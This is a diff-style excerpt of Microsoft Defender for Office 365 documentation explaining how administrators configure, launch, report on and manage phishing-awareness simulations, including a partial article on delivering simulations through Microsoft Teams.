-> If you selected **How-to Guide** as the [social engineering technique](#select-a-social-engineering-technique), you go directly to the [Select end user notification](#select-end-user-notifications) page.
-
-## Assign training
-
-On the **Assign training** page, you can assign trainings for the simulation. We recommend that you assign training for each simulation, as employees who go through training are less susceptible to similar attacks.
-
-Use the following options on the page to assign trainings as part of the simulation:
--- **Preferences** section: In **Select training content preference**, choose one of the following options in the dropdown list:-
- - **Microsoft training experience (Recommended)**: This is the default value. This value has the following associated options to configure on the page:
- - Select one of the following values:
- - **Assign training for me (Recommended)**: This is the default value. We assign training based on a user's previous simulation and training results.
- - **Select training courses and modules myself**: If you select this value, the next step in the wizard is **Training assignment** where you find and select trainings. The steps are described in the [Training assignment](#training-assignment) subsection.
- - **Due date** section: In **Select a training due date**, choose one of the following values:
- - **30 days after simulation ends** (this is the default value)
- - **15 days after simulation ends**
- - **7 days after simulation ends**
-
- - **Redirect to a custom URL**: This value has the following associated options to configure on the page:
- - **Custom training URL** (required)
- - **Custom training name** (required)
- - **Custom training description**
- - **Custom training duration (in minutes)**: The default value is 0, which means there's no specified duration for the training.
- - **Due date** section: In **Select a training due date**, choose one of the following values:
- - **30 days after simulation ends** (this is the default value)
- - **15 days after simulation ends**
- - **7 days after simulation ends**
-
- - **No training**: If you select this value, the only option on the page is **Next**.
-
-When you're finished on the **Assign training** page, select **Next**.
-
-### Training assignment
-
-> [!NOTE]
-> This page is available only if you selected **Select training courses and modules myself** on the **Assign training** page.
-
-On the **Training assignment** page, select the trainings that you want to add to the simulation by selecting :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add trainings**.
-
-In the **Add training** flyout that opens, use the following tabs to select trainings to include in the simulation:
--- **Recommended** tab: Shows the recommended built-in trainings based on the simulation configuration. These trainings are the same trainings that would have been assigned if you selected **Assign training for me (Recommended)** on the previous page.-- **All trainings** tab: Shows all built-in trainings that are available.--
-On either tab, the following information is shown for each training:
--- **Training name**-- **Source**: The value is **Global**.-- **Duration (mins)**-- **Preview**: Select **Preview** to see the training.-
-On either tab, you can use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find trainings. Type part of the training name and press the ENTER key.
-
-On either tab, select one or more trainings by selecting the check box next to the training name. To select all trainings, select the check box in the **Training name** column header. When you're finished, select **Add**.
-
-Back on the **Training assignment** page, the selected trainings are now listed. The following information is shown for each training:
--- **Training name**-- **Source**-- **Duration (mins)**-- **Assign to**: For each training, select who gets the training by selecting from the following values:
- - **All users**
- - One or both of the values **Clicked payload** or **Compromised**.
-- **Delete**: Select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** to remove the training from the simulation.--
-When you're finished on the **Training assignment** page, select **Next**.
-
-## Select a landing page
-
-On the **Select phish landing page** page, configure the web page that users are taken to if they open the payload in the simulation.
-
-Select one of the following options:
--- **Use landing pages from library**: The following options are available:
- - **Payload indicators** section: Select **Add payload indicators to email** to help users learn how do identify phishing email.
- - This setting isn't available if you selected **Malware Attachment** or **Link to Malware** on the [Select a social engineering technique](#select-a-social-engineering-technique) page.
- - For landing pages that you create on the **Tenant landing pages** tab, this setting is meaningful only if you use the **Dynamic tag** named **Insert Payload content** in the landing page content as described in the [Create landing pages](attack-simulation-training-landing-pages.md#create-landing-pages) subsection.
- - **Show the interstitial page before the landing page**: This setting is available only if you selected **Drive-by URL** on the [Select a social engineering technique](#select-a-social-engineering-technique) page. You can show the overlay that comes up for drive-by URL attacks. To hide the overlay and go directly to the landing page, don't select this option.
-
- The remainder of the **Selecting phish landing page** page has two tabs where you select the landing page to use:
-
- - **Global landing pages** tab: Contains the built-in landing pages. When you select a built-in landing page to use by selecting the check box next to name, an **Edit layout** section appears with the following options:
- - **Add logo**: Select **Browse logo image** to find and select a .png, .jpeg, or .gif file. The logo size should be a maximum of 210 x 70 to avoid distortion. To remove the logo, select **Remove uploaded logo image**.
- - **Select default language**: This setting is required. Select one of the following values: **Chinese (Simplified)**, **Chinese (Traditional, Taiwan)**, **Dutch**, **English**, **Spanish**, **French**, **German**, **Italian**, **Japanese**, **Korean**, **Portuguese, or **Russian**.
-
- - **Tenant landing pages** tab: Contains any custom landing pages that you created. To create a new landing page, select :::image type="icon" source="../../medi#create-landing-pages).
-
- On both tabs, the following information is shown for each landing page. You can sort the landing pages by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. The default columns are marked with an asterisk (<sup>\*</sup>):
-
- - **Name**<sup>\*</sup>
- - **Language**<sup>\*</sup>: If the landing page contains multiple translations, the first two languages are shown directly. To see the remaining languages, hover over the numeric icon (for example, **+10**).
- - **Source**
- - **Default language**<sup>\*</sup>
- - **Status**<sup>\*</sup>
- - **Linked simulations**<sup>\*</sup>
- - **Created by**
- - **Created time**<sup>\*</sup>
- - **Modified by**<sup>\*</sup>
- - **Last modified**<sup>\*</sup>
-
- To find a landing page in the list, type part of the landing page name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and then press the ENTER key.
-
- Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to filter the landing pages by language.
-
- When a landing page is selected, if you click anywhere in the row, a details flyout opens that shows more information about the landing page:
-
- - The **Preview** tab shows what the landing page looks like to users.
- - The **Details** tab shows the properties of the landing page.
-
- > [!TIP]
- > To see details about other landing pages without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
- When you're finished in the landing page details flyout, select **Close**.
-
- On the **Selecting phish landing page** page, select a landing page to use by selecting the check box next to the **Name** column.
--- **Use a custom URL**: This setting isn't available if you selected **Malware Attachment** or **Link to Malware** on the [Select technique](#select-a-social-engineering-technique) page.-
- If you select **Use a custom URL**, you need to add the URL in the **Enter the custom landing page URL** box that appears. No other options are available on the **Selecting phish landing page** page.
-
-When you're finished on the **Selecting phish landing page** page, select **Next**.
-
-## Select end user notifications
-
-On the **Select end user notification** page, select from the following notification options:
--- **Do not deliver notifications**: No other configuration options are available on the page. Users don't receive **Training assignment notifications**, **Training reminder notifications** or **Positive reinforcement notifications** from the simulation. Select **Proceed** in the warning dialog.--- **Microsoft default notification (recommended)**: The notifications that users receive are shown on the page:
- - **Microsoft default positive reinforcement notification** (for the **How-to Guide** [social engineering technique](#select-a-social-engineering-technique), this is the only available notification)
- - **Microsoft default training assignment notification**
- - **Microsoft default training reminder notification**
-
- Select the default language to use in **Select default language**. The available values are: **Chinese (Simplified)**, **Chinese (Traditional, Taiwan)**, **English**, **French**, **German**, **Italian**, **Japanese**, **Korean**, **Portuguese**, **Russian**, **Spanish**, **Dutch**, **Polish**, **Arabic**, **Finnish**, **Greek**, **Hungarian**, **Indonesian**, **Norwegian Bokmål**, **Romanian**, **Slovak**, **Swedish**, **Thai**, **Turkish**, **Vietnamese**, **Catalan**, **Croatian**, or **Slovenian**.
-
- For each notification, the following information is available:
-
- - **Notifications**: The name of the notification.
- - **Language**: If the notification contains multiple translations, the first two languages are shown directly. To see the remaining languages, hover over the numeric icon (for example, **+10**).
- - **Type**: One of the following values:
- - **Positive reinforcement notification**
- - **Training assignment notification**
- - **Training reminder notification**
- - **Delivery preferences**: You need to configure the following delivery preferences before you can continue:
- - For **Microsoft default positive reinforcement notification**, select **Do not deliver**, **Deliver after campaign ends**, or **Deliver during campaign**.
- - For **Microsoft default training reminder notification**, select **Twice a week** or **Weekly**.
- - **Actions**: If you select :::image type="icon" source="../../media/m365-cc-sc-view-icon.png" border="false"::: **View**, a **Review notification** page opens with the following information:
- - **Preview** tab: View the notification message as users see it. To view the message in different languages, use the **Select notification language** box.
- - **Details** tab: View details about the notification:
- - **Notification description**
- - **Source**: For built-in notifications, the value is **Global**. For custom notifications, the value is **Tenant**.
- - **Notification type**: One of the following types based on the notification you originally selected:
- - **Positive reinforcement notification**
- - **Training assignment notification**
- - **Training reminder notification**
- - **Modified by**
- - **Last modified**
-
- When you're finished on the **Review notification** page, select **Close** to return to the **Select end user notification** page.
--- **Customized end user notifications**: No other configuration options are available on the page. When you select **Next**, you need to select a **Training assignment notification**, a **Training reminder notification**, and (optionally) a **Positive reinforcement notification** to use for the simulation as described in the next three subsections.-
- > [!TIP]
- > For the **How-to Guide** [social engineering technique](#select-a-social-engineering-technique), you can only configure a [Positive reinforcement notification.](#select-a-positive-reinforcement-notification).
-
-When you're finished on the **Select end user notification** page, select **Next**.
-
-### Select a training assignment notification
-
-> [!NOTE]
-> This page is available only if you selected **Customized end user notifications** on the [Select end user notifications](#select-end-user-notifications) page.
-
-The **Training assignment notification** page shows the following notifications and their configured languages:
--- **Microsoft default training assignment notification**-- **Microsoft default training only campaign-training assignment notification**-- Any custom training assignment notifications that you previously created.-
-These notifications are also available at **Attack simulation training** \> **Content library** tab \> **End user notifications**:
--- Built-in training assignment notifications are available on the **Global notifications** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary&source=global>.-- Custom training assignment notifications are available on the **Tenant notifications** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary&source=tenant>.-
-For more information, see [End-user notifications for Attack simulation training](attack-simulation-training-end-user-notifications.md).
-
-Do one of the following steps:
--- Select an existing notification to use:
- - To search for an existing notification in the list, type part of the notification name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and then press the ENTER key.
- - When you select a notification by clicking anywhere in the row other than the check box, a details flyout opens that shows more information about the notification:
- - The **Preview** tab shows what the notification looks like to users.
- - The **Details** tab shows the properties of the notification.
-
- When you're finished in the notification details flyout, select **Close**.
-
- On the **Training assignment notification** page, select a notification to use by selecting the check box next to the name.
--- Create a new notification to use: Select :::image type="icon" source="../../medi#create-end-user-notifications).-
- > [!NOTE]
- > On the **Define details** page of the new notification wizard, be sure to select the value **Training assignment notification** for the notification type.
-
- When you're finished creating the notification, you return to the **Training assignment notification** page where the new notification now appears in the list for you to select
-
-When you're finished on the **Training assignment notification** page, select **Next**.
-
-### Select a training reminder notification
-
-> [!NOTE]
-> This page is available only if you selected **Customized end user notifications** on the [Select end user notifications](#select-end-user-notifications) page.
-
-The **Training reminder notification** page shows the following notifications and their configured languages:
--- **Microsoft default training reminder notification**-- **Microsoft default training only campaign-training reminder notification**-- Any custom training reminder notifications that you previously created.-
-These notifications are also available at **Attack simulation training** \> **Content library** tab \> **End user notifications**:
--- Built-in training reminder notifications are available on the **Global notifications** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary&source=global>.-- Custom training reminder notifications are available on the **Tenant notifications** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary&source=tenant>.-
-For more information, see [End-user notifications for Attack simulation training](attack-simulation-training-end-user-notifications.md).
-
-In **Set frequency for reminder notification**, select **Weekly** (the default value) or **Twice a week**, and then do one of the following steps:
--- Select an existing notification to use:
- - To search for an existing notification in the list, type part of the notification name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and then press the ENTER key.
- - When you select a notification by clicking anywhere in the row other than the check box, a details flyout opens that shows more information about the notification:
- - The **Preview** tab shows what the notification looks like to users.
- - The **Details** tab shows the properties of the notification.
-
- When you're finished in the notification details flyout, select **Close**.
-
- On the **Training reminder notification** page, select a notification to use by selecting the check box next to the name.
--- Create a new notification to use: Select :::image type="icon" source="../../medi#create-end-user-notifications).-
- > [!NOTE]
- > On the **Define details** page of the new notification wizard, be sure to select the value **Training reminder notification** for the notification type.
-
- When you're finished creating the notification, you return to the **Training reminder notification** page where the new notification now appears in the list for you to select.
-
-When you're finished on the **Training reminder notification** page, select **Next**.
-
-### Select a positive reinforcement notification
-
-> [!NOTE]
-> This page is available only if you selected **Customized end user notifications** on the [Select end user notifications](#select-end-user-notifications) page.
-
-You have the following options in the **Delivery preferences** section for positive reinforcement notifications:
--- Don't use positive reinforcement notifications: Select **Do not deliver** . There's nothing else to configure on the page, so you go to the [Launch details](#configure-the-simulation-launch-details) page when you select **Next**.--- Use an existing positive reinforcement notification: Select one of the remaining values:
- - **Deliver after the user reports a phish and campaign ends**
- - **Deliver immediately after the user reports a phish**.
-
- The following notifications and their configured languages appear on the page:
-
- - **Microsoft default positive reinforcement notification**
- - Any custom positive reinforcement notifications that you previously created.
-
- These notifications are also available at **Attack simulation training** \> **Content library** tab \> **End user notifications**:
-
- - Built-in positive reinforcement notifications are available on the **Global notifications** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary&source=global>.
- - Custom positive reinforcement notifications are available on the **Tenant notifications** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary&source=tenant>.
-
- For more information, see [End-user notifications for Attack simulation training](attack-simulation-training-end-user-notifications.md).
-
- To search for an existing notification in the list, type part of the notification name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and then press the ENTER key.
-
- When you select a notification by clicking anywhere in the row other than the check box, a details flyout opens that shows more information about the notification:
-
- - The **Preview** tab shows what the notification looks like to users.
- - The **Details** tab shows the properties of the notification.
-
- When you're finished in the notification details flyout, select **Close**.
-
- On the **Positive reinforcement notification** page, select an existing notification to use by selecting the check box next to the name.
--- Create a new positive reinforcement notification to use: Select :::image type="icon" source="../../medi#create-end-user-notifications).-
- > [!NOTE]
- > On the **Define details** page of the new notification wizard, be sure to select the value **Positive reinforcement notification** for the notification type.
-
- When you're finished creating the notification, you return to the **Positive reinforcement notification** page where the new notification now appears in the list for you to select.
-
-When you're finished on the **Positive reinforcement notification** page, select **Next**.
-
-## Configure the simulation launch details
-
-On the **Launch details** page, you choose when to start and end the simulation. We stop capturing interaction with this simulation after the end date you specify.
-
-Choose one of the following values:
--- **Launch this simulation as soon as I'm done**--- **Schedule this simulation to be launched later**: This value has the following associated options to configure:
- - **Select launch date**
- - **Select launch time hour**
- - **Select launch time minute**
- - **Select time format**: Select **AM** or **PM**.
-
-Configure the remaining options on the page:
--- **Configure number of days to end simulation after**: The default value is two days, which is also the minimum value. The maximum value is 30 days.-- **Enable region aware time zone delivery**: If you select this value, the simulated attack messages are delivered to users during their regional working hours.-
-When you're finished on the **Launch details** page, select **Next**.
-
-## Review simulation details
-
-On the **Review simulation** page, you can review the details of the simulation.
-
-Select the :::image type="icon" source="../../media/m365-cc-sc-send-icon.png" border="false"::: **Send a test** button to send a copy of the payload email to yourself (the currently logged in user) for inspection.
-
-You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard to modify the settings.
-
-When you're finished on the **Review simulation** page, select **Submit**.
--
-On the **Simulation has been scheduled for launch** page, you can use the links to go to the Attack simulation training overview or to view all payloads.
-
-When you're finished on the **Simulation has been scheduled for launch**, select **Done**.
-
-Back on the **Simulations** tab, the simulation that you created is now listed. The **Status** value depends on your previous selection in the [Configure the simulation launch details](#configure-the-simulation-launch-details) step:
--- **In progress** if you selected **Launch this simulation as soon as I'm done**.-- **Scheduled** if you selected **Schedule this simulation to be launched later**.-
-## View simulations
-
-The **Simulations** tab in Attack simulation training at <https://security.microsoft.com/attacksimulator> shows any simulations that you created.
-
-The following information is shown for each simulation. You can sort the simulations by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. By default, all columns are selected:
--- **Simulation name**-- **Type**-- **Platform**-- **Launch date**-- **End date**-- **Actual compromise rate (%)**: The percentage of people who were compromised by your simulation (users compromised / total number of users who receive the simulation).-- **Predicted compromise rate (%)**: Historical data across Microsoft 365 that predicts the percentage of people who should be compromised by this payload (users compromised / total number of users who receive the payload). For more information, see [Predicted compromise rate](attack-simulation-training-get-started.md#predicted-compromise-rate).-- **Technique**: The [social engineering technique](#select-a-social-engineering-technique) that's used in the simulation.-- **Status**: One of the following values:
- - **Draft**
- - **Scheduled**
- - **In progress**
- - **Completed**
- - **Failed**
- - **Canceled**
- - **Excluded**
-- **Γï«** (**Actions** control): Take action on the simulation. The available actions depend on the **Status** value of the simulation as described in the procedure sections. This control always appears at the end of the row.-
-> [!TIP]
-> To see all columns, you likely need to do one or more of the following steps:
->
-> - Horizontally scroll in your web browser.
-> - Narrow the width of appropriate columns.
-> - Remove columns from the view.
-> - Zoom out in your web browser.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to search for the name of an existing simulation.
-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to filter the simulations by **Technique** or **Status** (all **Status** values except for **Excluded**).
-
-When you're finished configuring filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-To see simulations that have been excluded from reporting (the **Status** value is **Excluded**), use the **Show excluded simulations** toggle on the **Simulations** tab.
-
-## View simulation reports
-
-For simulations with the **Status** value **In progress** or **Completed**, you can view the report for the simulation by using either of the following methods on the **Simulations** tab at <https://security.microsoft.com/attacksimulator?viewid=simulations>:
--- Select the simulation by clicking anywhere in the row other than the check box next to the name.-- Select the simulation by clicking **Γï«** (**Actions**) at the end of the row, and then select :::image type="icon" source="../../media/m365-cc-sc-eye-icon.png" border="false"::: **View report**.-
-The title of the report page that opens shows the name of the simulation and other information (for example, the status, social engineering technique, and delivery status).
-
-> [!TIP]
-> In the following scenarios, the report page opens, but no other information or actions are available on the page:
->
-> - The **Status** value is **Scheduled**.
-> - During the first few minutes after you create a simulation when the **Status** value is **In progress**.
-
-You can select :::image type="icon" source="../../media/m365-cc-sc-view-activity-timeline-icon.png" border="false"::: **View activity timeline** to see date/time information about the simulation (simulation scheduled, simulation launched, simulation ended, and training due dates).
-
-The rest of the report page contains tabs as described in the following subsections.
-
-To close the simulation report, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: **Close**.
-
-### Report tab
-
-For a description of what's on the **Report** tab for simulations, see [Simulation report for simulations](attack-simulation-training-insights.md#simulation-report-for-simulations).
-
-### Users tab
-
-The **Users** tab contains the following information for each user in the simulation. You can sort the users by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. The default columns are marked with an asterisk (<sup>\*</sup>):
--- **Name**<sup>\*</sup> (you can't deselect this value)-- **Compromised**<sup>\*</sup>-- **Reported**<sup>\*</sup>-- **Training status**<sup>\*</sup>-- **Other actions**<sup>\*</sup>-- **Compromised on**<sup>\*</sup>-- **Reported on**<sup>\*</sup>-- **Days out of office**-- **Message read on**-- **Message forwarded on**-- **Message deleted on**-- **Replied to message**-- **Failed deliveries**<sup>\*</sup>-- **Username**<sup>\*</sup> (you can't deselect this value)-- **Department**-- **Company**-- **Job title**-- **Office**-- **City**-- **Country/region**-- **Manager**-
-> [!TIP]
-> To see all columns, you likely need to do one or more of the following steps:
->
-> - Horizontally scroll in your web browser.
-> - Narrow the width of appropriate columns.
-> - Remove columns from the view.
-> - Zoom out in your web browser.
-
-To change the list of users from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to filter the targeted users by selecting one or more of the following values in the flyout that opens:
--- **Compromised**: Select **Yes** or **No**.-- **Reported message**: Select **Yes** or **No**.-- **Simulation message delivery**: Select **Delivered** or **Failed to deliver**.-- **Other actions**: *Select one or more of the following values: **Replied to message**, **Forwarded message**, and **Deleted messages**.-- **Training status**: Select **Completed**, **In progress**, **Not started**, or **Not assigned**.-- **Assigned trainings**: Select one or more of the assigned trainings.-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Search** box to find a user in the list by typing part of the name, and then press the ENTER key.
-
-### Details tab
-
-The **Details** tab contains details about the simulation in the following sections:
--- **Description** section:
- - **Delivery platform**
- - **Type**
- - **Technique**
- - **Launch details**
- - **Payload & login page**: Select **Preview payload & login page** to preview the payload and login page in a details flyout.
- - **Target users**: Select **View excluded users or groups** to see excluded users or groups in a details flyout.
- - **Landing page**: Select **Preview landing page** to preview the landing page.
- - **Training information** section: Contains a table with the following columns:
- - **Training name**
- - **Assign to**
- - **Actions**: Select :::image type="icon" source="../../media/m365-cc-sc-view-icon.png" border="false"::: **View** to see the training.
- - **Notifications** section: Contains a table with the following columns:
- - **Notification name**
- - **Notification type**
- - **Delivery frequency**
- - **Actions**: Select :::image type="icon" source="../../media/m365-cc-sc-view-icon.png" border="false"::: **View** to see the notification.
-
-## Take action on simulations
-
-All actions on existing simulations start on the **Simulations** tab. To go there, open the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Simulations** tab. Or, to go directly to the **Simulations** tab, use <https://security.microsoft.com/attacksimulator?viewid=simulations>.
-
-> [!TIP]
-> To see the **Γï«** (**Actions**) control that's required to act on simulations on the **Simulations** tab, you likely need to do one or more of the following steps:
->
-> - Horizontally scroll in your web browser.
-> - Narrow the width of appropriate columns.
-> - Remove columns from the view.
-> - Zoom out in your web browser.
-
-### Copy simulations
-
-You can copy an existing simulation and modify it to suit your needs. This action saves time and effort when you create new simulations based on previous ones.
-
-You can copy any simulation that's available in the **Simulations** tab, regardless of the **Status** value. When you copy the simulation, you can change the setting in the new copy of the simulation . For example, change the simulation name, description, technique, payload, and target users.
--- We don't recommend copying **Failed** simulations, because the reasons for failure could recur in the copied simulation.-- When you copy a simulation, the most recent settings are used in the copy (for example, the payload, landing page, and end-user notifications). If any content is deleted, you're prompted to select the respective content again.-- The latest targeted and excluded users at the time of simulation launch are used when groups are added from the search bar (**Search for users or groups**). The targeted and excluded users are unchanged in the following scenarios:
- - The user list was imported from a CSV file.
- - Users were added from the search bar.
- - Users were added for different categories: **All users**, **Suggested user groups**, **User tags**, **City**, Country, Department, Title.
-- Future scheduled launch times in the original simulation are copied and used as-is. Past launch times in the original simulation result in the default value **Launch this simulation as soon as I'm done** in the copy.-
-To copy a simulation, do the following steps:
-
-1. On the **Simulations** tab at <https://security.microsoft.com/attacksimulator?viewid=simulations>, find and select the simulation to copy by selecting the check box next to the name.
-2. Select the :::image type="icon" source="../../media/m365-cc-sc-copy-icon.png" border="false"::: **Copy simulation** action that appears on the tab.
-3. The simulation wizard opens with all the settings from the original simulation. The default simulation name on the **Name simulation** page is the original name plus the the suffix **_Copy**.
-4. Review and modify the simulation configuration as needed. Select **Submit** to launch it or **Save and close** to review it later. If you select **Cancel**, the copied simulation isn't saved.
-
-### Cancel simulations
-
-You can cancel simulations with the **Status** value **In progress** or **Scheduled**.
-
-To cancel a simulation, do the following steps:
-
-1. On the **Simulations** tab at <https://security.microsoft.com/attacksimulator?viewid=simulations>, find and select the in-progress or scheduled simulation to cancel by selecting **Γï«** (**Actions**) at the end of the row.
-2. Select :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: **Cancel simulation**, and then select **Confirm** in the confirmation dialog.
-
-After you cancel the simulation, the **Status** value changes to **Canceled**.
-
-### Remove simulations
-
-You can't remove simulations with the **Status** value **In progress**.
-
-To remove a simulation, do the following steps:
-
-1. On the **Simulations** tab at <https://security.microsoft.com/attacksimulator?viewid=simulations>, find and select the simulation to remove by selecting **Γï«** (**Actions**) at the end of the row.
-2. Select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete**, and then select **Confirm** in the confirmation dialog.
-
-After you remove the simulation, it no longer appears on the **Simulations** tab.
-
-### Exclude completed simulations from reporting
-
-The **Exclude** action is available only for simulations with the **Status** value **Competed**.
-
-By default, all completed simulations are included in reporting. To exclude a completed simulation from reporting, do the following steps:
-
-1. On the **Simulations** tab at <https://security.microsoft.com/attacksimulator?viewid=simulations>, find and select the completed simulation to exclude from reporting by selecting **Γï«** (**Actions**) at the end of the row.
-2. Select :::image type="icon" source="../../media/m365-cc-sc-exclude-icon.png" border="false"::: **Exclude**, and then select **Confirm** in the confirmation dialog.
-
-After you exclude the completed simulation from reporting, the **Status** value changes to **Excluded**, and the simulation is no longer visible on the **Simulations** tab when the **Show excluded simulations** toggle is off :::image type="icon" source="../../media/scc-toggle-off.png" border="false":::.
-
-To see completed simulations that have been excluded from reporting, use either of the following methods:
--- On the **Simulations** tab, toggle **Show excluded simulations** to on :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::. Only excluded simulations are shown.-- On the **Settings** tab at <https://security.microsoft.com/attacksimulator?viewid=setting>, select the **View all** link in the **Simulations excluded from reporting** section. This action takes you to the **Simulations** tab where **Show excluded simulations** is toggled on :::image type="icon" source="../../medi#view-simulations-excluded-from-reporting).-
-### Include completed simulations in reporting
-
-A simulation is excluded from reporting only if you exclude it as described in the previous section. The **Include** action is available only for simulations with the **Status** value **Excluded**, which are visible on the **Simulations** tab only when **Show excluded simulations** is toggled on :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::.
-
-To include a completed session in reporting after it has been excluded, do the following steps:
-
-1. On the **Simulations** tab at <https://security.microsoft.com/attacksimulator?viewid=simulations>, set the **Show excluded simulations** toggle to :::image type="icon" source="../../media/scc-toggle-on.png" border="false"::: **On**.
-2. Select the simulation by clicking **Γï«** (**Actions**) at the end of the row, and then select :::image type="icon" source="../../media/m365-cc-sc-include-icon.png" border="false"::: **Exclude**.
-
-After you included the excluded simulation, the **Status** value changes to **Completed**. Toggle **Show excluded simulations** to off :::image type="icon" source="../../media/scc-toggle-off.png" border="false"::: to see the simulation.
security Attack Simulation Training Teams https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/attack-simulation-training-teams.md
- Title: Microsoft Teams in Attack simulation training------
- - m365-security
- - tier2
-description: Admins can learn about the addition of Microsoft Teams in delivering simulated phishing attacks in Attack simulation training in Microsoft Defender for Office 365 Plan 2.
Previously updated : 3/15/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Microsoft Teams in Attack simulation training
-
-> [!IMPORTANT]
-> Currently, Microsoft Teams in Attack simulation training is in Private Preview. The information in this article is subject to change.
-
-In organizations with Microsoft Defender for Office 365 Plan 2 or Microsoft Defender XDR, admins can now use Attack simulation training to deliver simulated phishing messages in Microsoft Teams. For more information about attack simulation training, see [Get started using Attack simulation training in Defender for Office 365](attack-simulation-training-get-started.md).
-
-The addition of Teams in Attack simulation training affects the following features:
--- [Simulations](attack-simulation-training-simulations.md)-- [Payloads](attack-simulation-training-payloads.md)-- [Simulation automations](attack-simulation-training-simulation-automations.md)-
-[Payload automations](attack-simulation-training-payload-automations.md), [end-user notifications](attack-simulation-training-end-user-notifications.md), [login pages](attack-simulation-training-login-pages.md), and [landing pages](attack-simulation-training-landing-pages.md) aren't affected by Teams in Attack simulation training.
--
-## Teams simulation configuration
-
-> [!NOTE]
-> Currently, the steps in this section apply only if your organization is enrolled in the Private Preview of **Attack simulation training for Teams**.
-
-In addition to having user reporting for Teams messages turned on as described in [User reported message settings in Microsoft Teams](submissions-teams.md), you also need to configure the Teams accounts that can be used as sources for simulation messages in Attack simulation training. To configure the accounts, do the following steps:
-
-1. Identify or create a user who's a member of the [Global Administrator](/entra/identity/role-based-access-control/permissions-reference#global-administrator), [Security Administrator](/entra/identity/role-based-access-control/permissions-reference#security-administrator), or [Attack Simulation Administrator](/entra/identity/role-based-access-control/permissions-reference#attack-simulation-administrator) roles in Microsoft Entra ID. Assign a Microsoft 365, Office 365, Microsoft Teams Essentials, Microsoft 365 Business Basic, or a Microsoft 365 Business Standard license for [Microsoft Teams](/office365/servicedescriptions/teams-service-description). You need to know the password.
-2. Using the account from Step 1, open the Microsoft Defender portal at <https://security.microsoft.com> and go to **Email & collaboration** \> **Attack simulation training** \> **Settings** tab. Or, to go directly to the **Settings** tab, use <https://security.microsoft.com/attacksimulator?viewid=setting>.
-3. On the **Settings** tab, select **Manager user accounts** in the **Teams simulation configuration** section.
-4. In the **Teams simulation configuration** flyout that opens, select **Generate token**. Read the information in the confirmation dialog, and then select **I agree**.
-5. Back on the **Settings** tab, select **Manager user accounts** in the **Teams simulation configuration** section again to reopen the **Teams simulation configuration** flyout. The user account that you were logged in as now appears in the **User accounts available for Teams phishing** section.
-
-To remove a user from the list, select the check box next to the display name value without clicking anywhere else in the row. Select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** action that appears, and then select **Delete** in the confirmation dialog.
-
-To prevent the account from being used in Teams simulations but keep the linked simulations history for the account, select the check box next to the display name value without clicking anywhere else in the row. Select the :::image type="icon" source="../../media/m365-cc-sc-block-sender-icon.png" border="false"::: **Deactivate** action that appears.
-
-## Changes in simulations for Microsoft Teams
-
-Teams introduces the following changes to viewing and creating simulations as described in [Simulate a phishing attack with Attack simulation training in Defender for Office 365](attack-simulation-training-simulations.md):
--- On the **Simulations** tab at <https://security.microsoft.com/attacksimulator?viewid=simulations>, the **Platform** column shows the value **Teams** for simulations that use Teams messages.--- If you select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Launch a simulation** on the **Simulations** tab to create a simulation, the first page of the new simulation wizard is **Select delivery platform** where you can select **Microsoft Teams**. Selecting **Microsoft Teams** introduces the following changes to the rest of the new simulation wizard:-
- - On the **[Select technique](attack-simulation-training-simulations.md#select-a-social-engineering-technique)** page, the following social engineering techniques aren't available:
- - **Malware Attachment**
- - **Link in Attachment**
